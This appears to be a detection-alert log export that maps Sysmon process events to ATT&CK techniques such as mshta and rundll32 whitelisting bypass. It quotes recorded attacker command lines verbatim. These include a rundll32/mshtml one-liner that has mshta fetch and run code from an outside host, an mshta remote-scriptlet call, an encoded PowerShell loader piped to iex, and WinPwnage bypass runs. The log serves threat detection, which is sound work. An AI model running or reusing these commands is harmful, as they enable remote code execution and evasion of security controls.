SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A 365ABB72-1A29-5CE4-0000-00107BE42101 2920 C:\Windows\System32\rundll32.exe rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true); ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1170] Detecting Mshta,1558452779.389278,2019-05-21T19:32:59.389278+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line ("C:\Windows\System32\mshta.exe" https://hotelesms.com/talsk.txt) and Parent Image :C:\Windows\System32\rundll32.exe , Parent CommandLine (rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true);) in directory : ( C:\Users\IEUser\Desktop\ )",1," 1 5 4 1 0 0x8000000000000000 4127 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-21 15:32:57.837 365ABB72-1A29-5CE4-0000-001079F92101 2432 C:\Windows\System32\mshta.exe 11.00.9600.16428 (winblue_gdr.131013-1700) Microsoft (R) HTML Application host Internet Explorer Microsoft Corporation "C:\Windows\System32\mshta.exe" https://hotelesms.com/talsk.txt C:\Users\IEUser\Desktop\ IEWIN7\IEUser 365ABB72-39CC-5CE3-0000-002096C70000 0xc796 1 High SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A 365ABB72-1A29-5CE4-0000-00107BE42101 2920 C:\Windows\System32\rundll32.exe rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true); ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1117] Bypassing Application Whitelisting,1557669406.573766,2019-05-12T17:56:46.573766+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( "C:\Windows\System32\rundll32.exe" shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url)",1," 1 5 4 1 0 0x8000000000000000 16438 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-12 13:56:12.485 365ABB72-25FC-5CD8-0000-0010906A1300 2168 C:\Windows\System32\rundll32.exe 6.1.7600.16385 (win7_rtm.090713-1255) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\System32\rundll32.exe" shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ IEWIN7\IEUser 365ABB72-2523-5CD8-0000-00204C360100 0x1364c 1 Medium SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 365ABB72-25EC-5CD8-0000-0010CB0A1000 684 C:\Python27\python.exe python winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe ",IEWIN7,Microsoft-Windows-Sysmon/Operational [ T1059 ] wscript or cscript runing script,1634833622.319552,2021-10-21T20:27:02.319552+04:00,,Threat,High,"Found User (LAPTOP-JU4M3I0E\bouss) Trying to run wscript or cscript with Command Line (cscript.exe //e:jscript testme.js) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine ("C:\Windows\System32\cmd.exe") in directory : ( C:\Users\bouss\Desktop\ )",1," 1 5 4 1 0 0x8000000000000000 10920364 Microsoft-Windows-Sysmon/Operational LAPTOP-JU4M3I0E 2021-10-21 16:27:02.278 00247C92-94D6-6171-0000-00100514967B 28176 C:\Windows\System32\cscript.exe 5.812.10240.16384 Microsoft ® Console Based Script Host Microsoft ® Windows Script Host Microsoft Corporation cscript.exe cscript.exe //e:jscript testme.js C:\Users\bouss\Desktop\ LAPTOP-JU4M3I0E\bouss 00247C92-3C1A-6169-0000-0020C2790700 0x779c2 1 Medium SHA1=C3D511D4CF77C50D00A5264C6BB3AE44E5008831,MD5=B8454647EFC71192BF7B1572D18F7BD8,SHA256=C69648B049E35FF96523C911737A0481D52DD06508A561094A4FA895A30A6535,IMPHASH=2B44D2206B9865383429E9C1524F1CAC 00247C92-85C9-6170-0000-001008E62B6B 24148 C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" ",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational "[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557669406.573766,2019-05-12T17:56:46.573766+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url )",1," 1 5 4 1 0 0x8000000000000000 16438 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-12 13:56:12.485 365ABB72-25FC-5CD8-0000-0010906A1300 2168 C:\Windows\System32\rundll32.exe 6.1.7600.16385 (win7_rtm.090713-1255) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\System32\rundll32.exe" shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ IEWIN7\IEUser 365ABB72-2523-5CD8-0000-00204C360100 0x1364c 1 Medium SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 365ABB72-25EC-5CD8-0000-0010CB0A1000 684 C:\Python27\python.exe python winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1558920558.662701,2019-05-27T05:29:18.662701+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool ". )" /text:processmodel.username ),1," 1 5 4 1 0 0x8000000000000000 5931 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-27 01:29:18.622 365ABB72-3D6E-5CEB-0000-0010EF9EFF00 3756 C:\Windows\System32\inetsrv\appcmd.exe 7.5.7600.16385 (win7_rtm.090713-1255) Application Server Command Line Admin Tool Internet Information Services Microsoft Corporation "C:\Windows\System32\inetsrv\appcmd.exe" list apppool ". )" /text:processmodel.username C:\Windows\Temp\ IIS APPPOOL\DefaultAppPool 365ABB72-B26B-5CEA-0000-002023240800 0x82423 0 High SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 365ABB72-3D4A-5CEB-0000-0010FA93FD00 2584 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1085] Rundll32 Execution detected,1557669406.573766,2019-05-12T17:56:46.573766+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url )",1," 1 5 4 1 0 0x8000000000000000 16438 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-12 13:56:12.485 365ABB72-25FC-5CD8-0000-0010906A1300 2168 C:\Windows\System32\rundll32.exe 6.1.7600.16385 (win7_rtm.090713-1255) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\System32\rundll32.exe" shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ IEWIN7\IEUser 365ABB72-2523-5CD8-0000-00204C360100 0x1364c 1 Medium SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 365ABB72-25EC-5CD8-0000-0010CB0A1000 684 C:\Python27\python.exe python winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1117] Bypassing Application Whitelisting,1603490301.696651,2020-10-24T01:58:21.696651+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222)",1," 1 5 4 1 0 0x8000000000000000 424175 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-10-23 21:58:21.693 747F3D96-51FD-5F93-0000-00103B425E00 7504 C:\Windows\SysWOW64\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-4690-5F93-0000-002019A60800 0x8a619 1 Medium SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B 747F3D96-51F9-5F93-0000-0010551E5E00 9116 C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1601936900.530243,2020-10-06T02:28:20.530243+04:00,,Threat,Low,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\windows\system32\cmd.exe" ),1," 1 5 4 1 0 0x8000000000000000 2164913 Microsoft-Windows-Sysmon/Operational LAPTOP-JU4M3I0E 2020-10-05 22:28:20.529 00247C92-9E04-5F7B-0000-0010CF98272C 12876 C:\Windows\System32\cmd.exe 10.0.18362.449 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation Cmd.Exe "C:\windows\system32\cmd.exe" C:\windows\system32\ LAPTOP-JU4M3I0E\bouss 00247C92-8C36-5F75-0000-002034E39103 0x391e334 2 High SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18 00247C92-9E03-5F7B-0000-0010A645272C 20228 C:\Windows\System32\mmc.exe "C:\Windows\System32\mmc.exe" WF.msc ",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational [T1047] Windows Management Instrumentation - Process,1558969966.981641,2019-05-27T19:12:46.981641+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name="swprv") get state ),1," 1 5 4 1 0 0x8000000000000000 6177 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-27 15:12:45.437 365ABB72-FE6D-5CEB-0000-0010122D0C00 1636 C:\Windows\System32\wbem\WMIC.exe 6.1.7600.16385 (win7_rtm.090713-1255) WMI Commandline Utility Microsoft® Windows® Operating System Microsoft Corporation C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name="swprv") get state C:\Windows\system32\ NT AUTHORITY\SYSTEM 365ABB72-7B40-5CEC-0000-0020E7030000 0x3e7 0 System SHA1=4368DBD172224EC9461364BE1AC9DFFC5D9224A8,MD5=A03CF3838775E0801A0894C8BACD2E56,SHA256=132AA270790F56A7524CAB968927ED5E1D91B9A26D4BADCB24E450E7DECC5F81,IMPHASH=B59AF26B08AA14BA66272388BC9C2443 365ABB72-FE6D-5CEB-0000-0010332A0C00 3876 C:\Windows\System32\cmd.exe cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name="swprv") get state ",IEWIN7,Microsoft-Windows-Sysmon/Operational "[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1603490301.696651,2020-10-24T01:58:21.696651+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 ),1," 1 5 4 1 0 0x8000000000000000 424175 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-10-23 21:58:21.693 747F3D96-51FD-5F93-0000-00103B425E00 7504 C:\Windows\SysWOW64\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-4690-5F93-0000-002019A60800 0x8a619 1 Medium SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B 747F3D96-51F9-5F93-0000-0010551E5E00 9116 C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [ T1218.005 ] Mshta found running in the system,1564435999.891564,2019-07-30T01:33:19.891564+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run mshta with Command Line (mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct").Exec();close();) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (cmd /c mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct").Exec();close();) in directory : ( C:\Windows\system32\ )",1," 1 5 4 1 0 0x8000000000000000 4904 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:33:18.451 747F3D96-661E-5D3F-0000-00107F248700 3164 C:\Windows\System32\mshta.exe 11.00.17763.1 (WinBuild.160101.0800) Microsoft (R) HTML Application host Internet Explorer Microsoft Corporation mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct").Exec();close(); C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=DD8B22ACEA424823BB64ABF71F61A03D41177C38,MD5=F328FDCFF05BF02C2C986D52AED8BC2A,SHA256=E616C5CE71886652C13E2E1FA45A653B44D492B054F16B15A38418B8507F57C7,IMPHASH=42DA177DE2FAA97C3DFAEC9562772A7F 747F3D96-661E-5D3F-0000-0010A3148700 776 C:\Windows\System32\cmd.exe cmd /c mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct").Exec();close(); ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1117] Bypassing Application Whitelisting,1584766818.050631,2020-03-21T09:00:18.050631+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," 1 5 4 1 0 0x8000000000000000 243527 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-03-21 05:00:17.682 747F3D96-9F61-5E75-0000-001059841E00 8076 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32 windowscoredeviceinfo.dll,CreateBackdoor C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-9DBA-5E75-0000-0020E7030000 0x3e7 0 System SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-9DBC-5E75-0000-00102C390100 1652 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1085] Rundll32 Execution detected,1603490301.696651,2020-10-24T01:58:21.696651+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 ),1," 1 5 4 1 0 0x8000000000000000 424175 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-10-23 21:58:21.693 747F3D96-51FD-5F93-0000-00103B425E00 7504 C:\Windows\SysWOW64\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-4690-5F93-0000-002019A60800 0x8a619 1 Medium SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B 747F3D96-51F9-5F93-0000-0010551E5E00 9116 C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1117] Bypassing Application Whitelisting,1558452777.867089,2019-05-21T19:32:57.867089+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true);)",1," 1 5 4 1 0 0x8000000000000000 4126 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-21 15:32:57.276 365ABB72-1A29-5CE4-0000-00107BE42101 2920 C:\Windows\System32\rundll32.exe 6.1.7600.16385 (win7_rtm.090713-1255) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true); C:\Users\IEUser\Desktop\ IEWIN7\IEUser 365ABB72-39CC-5CE3-0000-002096C70000 0xc796 1 High SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 365ABB72-1A29-5CE4-0000-001054E32101 1532 C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true); ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1170] Detecting Mshta,1564435999.891564,2019-07-30T01:33:19.891564+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run mshta with Command Line (mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct").Exec();close();) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (cmd /c mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct").Exec();close();) in directory : ( C:\Windows\system32\ )",1," 1 5 4 1 0 0x8000000000000000 4904 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:33:18.451 747F3D96-661E-5D3F-0000-00107F248700 3164 C:\Windows\System32\mshta.exe 11.00.17763.1 (WinBuild.160101.0800) Microsoft (R) HTML Application host Internet Explorer Microsoft Corporation mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct").Exec();close(); C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=DD8B22ACEA424823BB64ABF71F61A03D41177C38,MD5=F328FDCFF05BF02C2C986D52AED8BC2A,SHA256=E616C5CE71886652C13E2E1FA45A653B44D492B054F16B15A38418B8507F57C7,IMPHASH=42DA177DE2FAA97C3DFAEC9562772A7F 747F3D96-661E-5D3F-0000-0010A3148700 776 C:\Windows\System32\cmd.exe cmd /c mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct").Exec();close(); ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational "[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766818.050631,2020-03-21T09:00:18.050631+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," 1 5 4 1 0 0x8000000000000000 243527 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-03-21 05:00:17.682 747F3D96-9F61-5E75-0000-001059841E00 8076 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32 windowscoredeviceinfo.dll,CreateBackdoor C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-9DBA-5E75-0000-0020E7030000 0x3e7 0 System SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-9DBC-5E75-0000-00102C390100 1652 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1564845391.87585,2019-08-03T19:16:31.875850+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," 1 5 4 1 0 0x8000000000000000 5536 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-08-03 15:16:31.676 747F3D96-A54F-5D45-0000-0010D83FA101 1716 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-56A3-5D45-0000-0020B3D31800 0x18d3b3 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-A54F-5D45-0000-0010C429A101 6080 